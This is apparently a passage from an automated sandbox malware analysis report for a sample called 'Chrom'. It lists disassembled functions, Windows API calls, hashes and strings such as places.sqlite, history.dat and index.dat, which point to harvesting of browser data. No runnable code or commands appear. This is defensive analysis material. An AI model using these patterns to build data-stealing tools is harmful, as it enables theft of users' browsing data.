                                                                                                                                                        • Opcode Fuzzy Hash: 394c4c75fa7beffb2d5a2aa385abc5dc66d0e768d5be117711317e139cb40491
                                                                                                                                                        • Instruction Fuzzy Hash: A51137B2D8021CA6EB10E761DC86FDB77ACAB14308F1105B7BD04F51C3E6B89ED84699
                                                                                                                                                        Function 0043C798 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043C86A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                        • API String ID: 2221118986-1725073988
                                                                                                                                                        • Opcode ID: b3be54a25f95d4426186d96762bdc05463f7e7b5d4954b2f9a60bb8f93d58d58
                                                                                                                                                        • Instruction ID: d119b0dec74e9b19e5a25435855cd8d11ca1b6cc1a1ec524576f73f373bec87f
                                                                                                                                                        • Opcode Fuzzy Hash: b3be54a25f95d4426186d96762bdc05463f7e7b5d4954b2f9a60bb8f93d58d58
                                                                                                                                                        • Instruction Fuzzy Hash: 05827A71A00218AFDF25DF69C881AAE7BB1FF08318F14511AFD15A7292D77AEC41CB94
                                                                                                                                                        Function 0040D540 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D57A
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D598
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5B6
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5D4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                                        • Opcode ID: 9e807e9980987f70bb2a73660c85433d145fa0dd07df9d2969b3cf11719032c3
                                                                                                                                                        • Instruction ID: 0e0a047154a33720e6f2f45df11e84489cdf12d838f6504bc1093cfb551ce4d4
                                                                                                                                                        • Opcode Fuzzy Hash: 9e807e9980987f70bb2a73660c85433d145fa0dd07df9d2969b3cf11719032c3
                                                                                                                                                        • Instruction Fuzzy Hash: F70171B26023005EFB5EDB3AED07B2D66A0EB48311F04453EE602CD1F6EEB5D6408B08
                                                                                                                                                        Function 0041691E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 004167FF
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416810
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416821
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416832
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416843
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416854
                                                                                                                                                          • Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416865
                                                                                                                                                        • memcmp.MSVCRT(?,00452BCC,00000010,?,00000000,?), ref: 004169BD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$memcmp
                                                                                                                                                        • String ID: $$8
                                                                                                                                                        • API String ID: 2808797137-435121686
                                                                                                                                                        • Opcode ID: c8c4ce928d5e3aac457400f17cb603f47478cc1e293077f961af05addd09d54a
                                                                                                                                                        • Instruction ID: d6b0cb39fe6b11ebd3f8115ad541cfda54a2ea99a1e62a8371d336f42745e82c
                                                                                                                                                        • Opcode Fuzzy Hash: c8c4ce928d5e3aac457400f17cb603f47478cc1e293077f961af05addd09d54a
                                                                                                                                                        • Instruction Fuzzy Hash: CB3183B1A00219AFCF10DF95CD80AEEB7B8BF48354F11455AE811B3241D778ED848F65
                                                                                                                                                        Function 0040C210 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040BD7C: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040BDF1
                                                                                                                                                          • Part of subcall function 0040BD7C: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040BE10
                                                                                                                                                          • Part of subcall function 0040BD7C: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040BE1D
                                                                                                                                                          • Part of subcall function 0040BD7C: GetFileSize.KERNEL32(?,00000000), ref: 0040BE32
                                                                                                                                                          • Part of subcall function 0040BD7C: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040BE5C
                                                                                                                                                          • Part of subcall function 0040BD7C: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040BE71
                                                                                                                                                          • Part of subcall function 0040BD7C: WriteFile.KERNELBASE(00000000,00000000,00000104,0040C401,00000000), ref: 0040BE8C
                                                                                                                                                          • Part of subcall function 0040BD7C: UnmapViewOfFile.KERNEL32(00000000), ref: 0040BE93
                                                                                                                                                          • Part of subcall function 0040BD7C: CloseHandle.KERNELBASE(?), ref: 0040BE9C
                                                                                                                                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C2E0
                                                                                                                                                          • Part of subcall function 0040C009: memset.MSVCRT ref: 0040C0DE
                                                                                                                                                          • Part of subcall function 0040C009: wcschr.MSVCRT ref: 0040C116
                                                                                                                                                          • Part of subcall function 0040C009: memcpy.MSVCRT(?,-00000121,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C14A
                                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C301
                                                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040C401,000000FF,?,00000104,00000000), ref: 0040C328
                                                                                                                                                          • Part of subcall function 0040BED3: memset.MSVCRT ref: 0040BF1B
                                                                                                                                                          • Part of subcall function 0040BED3: _snwprintf.MSVCRT ref: 0040BFB5
                                                                                                                                                          • Part of subcall function 0040BED3: free.MSVCRT ref: 0040BFE9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1979745280-0
                                                                                                                                                        • Opcode ID: b5aaa30312d5fcc67f85845942f74e89b96bccb2180b41cf2d59821ccef51685
                                                                                                                                                        • Instruction ID: 93ccc22cef0f4177ecd56315f2e6d26b449d926f0b5ad61dc23816b56d629bd5
                                                                                                                                                        • Opcode Fuzzy Hash: b5aaa30312d5fcc67f85845942f74e89b96bccb2180b41cf2d59821ccef51685
                                                                                                                                                        • Instruction Fuzzy Hash: D13106B1C00628DBCF60DBA5CC856CEF7B8EF54314F2042ABA518B31A1DB756E958F58
                                                                                                                                                        Function 00412DB7 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00412F8E: memset.MSVCRT ref: 00412FAA
                                                                                                                                                          • Part of subcall function 00412F8E: memset.MSVCRT ref: 00412FBF
                                                                                                                                                          • Part of subcall function 00412F8E: wcscat.MSVCRT ref: 00412FE8
                                                                                                                                                          • Part of subcall function 00412F8E: wcscat.MSVCRT ref: 00413011
                                                                                                                                                        • memset.MSVCRT ref: 00412DF6
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                          • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
                                                                                                                                                          • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                        • String ID: history.dat$places.sqlite
                                                                                                                                                        • API String ID: 2641622041-467022611
                                                                                                                                                        • Opcode ID: 08c1b444eb520b35a7a7d5c0fb7f8aeaa4787e0a4d64b0aa0e69da993d74c1dc
                                                                                                                                                        • Instruction ID: 0913544ad1c32b840834749151f10e29a01f1c6a2781536613fb288058adf295
                                                                                                                                                        • Opcode Fuzzy Hash: 08c1b444eb520b35a7a7d5c0fb7f8aeaa4787e0a4d64b0aa0e69da993d74c1dc
                                                                                                                                                        • Instruction Fuzzy Hash: BE115E72940219A6CB10FA66CD46ACE77BC9F40354F1101B6A914F61C2EB3CAF95CAA9
                                                                                                                                                        Function 00419544 Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004194C7: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 004194E8
                                                                                                                                                          • Part of subcall function 004194C7: GetLastError.KERNEL32 ref: 004194F9
                                                                                                                                                          • Part of subcall function 004194C7: GetLastError.KERNEL32 ref: 004194FF
                                                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00419574
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041957E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 839530781-0
                                                                                                                                                        • Opcode ID: 2f4b618ee86a0e133fb5120afe2878c9d32770f55e3633c820ca502eedbfd477
                                                                                                                                                        • Instruction ID: 11002ccd72b8a74f474208f9e9940f6dfa3330b5e17921820ced85d813cc92d2
                                                                                                                                                        • Opcode Fuzzy Hash: 2f4b618ee86a0e133fb5120afe2878c9d32770f55e3633c820ca502eedbfd477
                                                                                                                                                        • Instruction Fuzzy Hash: E401AD33208208BFEB119FA5DC41BEA3B6DEB45360F100432F908E6240D325ED9487ED
                                                                                                                                                        Function 0040C681 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                        • String ID: *.*$index.dat
                                                                                                                                                        • API String ID: 1974802433-2863569691
                                                                                                                                                        • Opcode ID: 0124a788923a264a0f71dca03e4d7c55c72886d07455ff904c63946b470e1fd6
                                                                                                                                                        • Instruction ID: b35fd175f81657b3a82865a2fc917a928efaf22c6e287d3be843c0a7ee8e476f
                                                                                                                                                        • Opcode Fuzzy Hash: 0124a788923a264a0f71dca03e4d7c55c72886d07455ff904c63946b470e1fd6
                                                                                                                                                        • Instruction Fuzzy Hash: 41015671801568D5DB20E761DC426DE73BC9F04314F5056B7A819F21D2E7389F858F9D
                                                                                                                                                        Function 004194C7 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 004194E8
                                                                                                                                                        • GetLastError.KERNEL32 ref: 004194F9
                                                                                                                                                        • GetLastError.KERNEL32 ref: 004194FF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                                        • Opcode ID: 1fa7c2f3d529686f49671a40cca17831ab9a59f419c89db5340c4276b833b879
                                                                                                                                                        • Instruction ID: 1998d2df4d7dc22cf6efa6b8a4ec31ccf4d22c2bb1f0502cb4b25adc0a96311e
                                                                                                                                                        • Opcode Fuzzy Hash: 1fa7c2f3d529686f49671a40cca17831ab9a59f419c89db5340c4276b833b879
                                                                                                                                                        • Instruction Fuzzy Hash: 63F03072514115FBCB019F74DC109AA7AE9EB05360B144736F822E6294E730ED419A94
                                                                                                                                                        Function 0040A004 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1125800050-0
                                                                                                                                                        • Opcode ID: 0ac39e12c10960c6ae965ccf36b1fe6417054cdce8b353a9a0186d0b00836cfd
                                                                                                                                                        • Instruction ID: fdba6f523a0edeb98830ec5a6e2b40949d18461f6cb5c57ccf156b0356e15e7f
                                                                                                                                                        • Opcode Fuzzy Hash: 0ac39e12c10960c6ae965ccf36b1fe6417054cdce8b353a9a0186d0b00836cfd
                                                                                                                                                        • Instruction Fuzzy Hash: 68E0927A500319E7DB605B50EC4CFC737BCEF45304F000070B945E2150E634AA888BA8
                                                                                                                                                        Function 0040A5EB Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00412D6B,00000000,?,00000000,?,00000000), ref: 0040A603
                                                                                                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A617
                                                                                                                                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00414002), ref: 0040A620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3397143404-0
                                                                                                                                                        • Opcode ID: 59ad0a99eb535f7e7912cc29790ae94c4f7a44c8f5267afefbc4dab143821918
                                                                                                                                                        • Instruction ID: 54e7b0a2fac03467780574bc71659ffc5b237acda61c65fae5605327c05023f7
                                                                                                                                                        • Opcode Fuzzy Hash: 59ad0a99eb535f7e7912cc29790ae94c4f7a44c8f5267afefbc4dab143821918
                                                                                                                                                        • Instruction Fuzzy Hash: ADE04F3A200290BBE2311B26EC0CF4B2E79DBCBB21F150539B955E21E086204919C768
                                                                                                                                                        Function 00409FB3 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.MSVCRT ref: 00409FCF
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                        • free.MSVCRT ref: 00409FF0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemallocmemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3056473165-0
                                                                                                                                                        • Opcode ID: 9398946df9da7633900af1d4d8dee9f6475252f93bc7d5b1a1eb9b1b3952e123
                                                                                                                                                        • Instruction ID: 3fa6d8dc34f6a2d7cc02f22bfce68f49e3ca57b08464e0138f2fbe8277461859
                                                                                                                                                        • Opcode Fuzzy Hash: 9398946df9da7633900af1d4d8dee9f6475252f93bc7d5b1a1eb9b1b3952e123
                                                                                                                                                        • Instruction Fuzzy Hash: B3F082B26052269FD708AF75A98185BB39DEF55364B12483FF404E7282DB389C50C7A9
                                                                                                                                                        Function 00415974 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 004159BC
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004159C8
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004159D4
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004159E0
                                                                                                                                                          • Part of subcall function 0041599C: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004159EC
                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,lXA,00000104,0041586C,00000000,?), ref: 00415993
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$FileModuleName
                                                                                                                                                        • String ID: lXA
                                                                                                                                                        • API String ID: 3859505661-3442822412
                                                                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
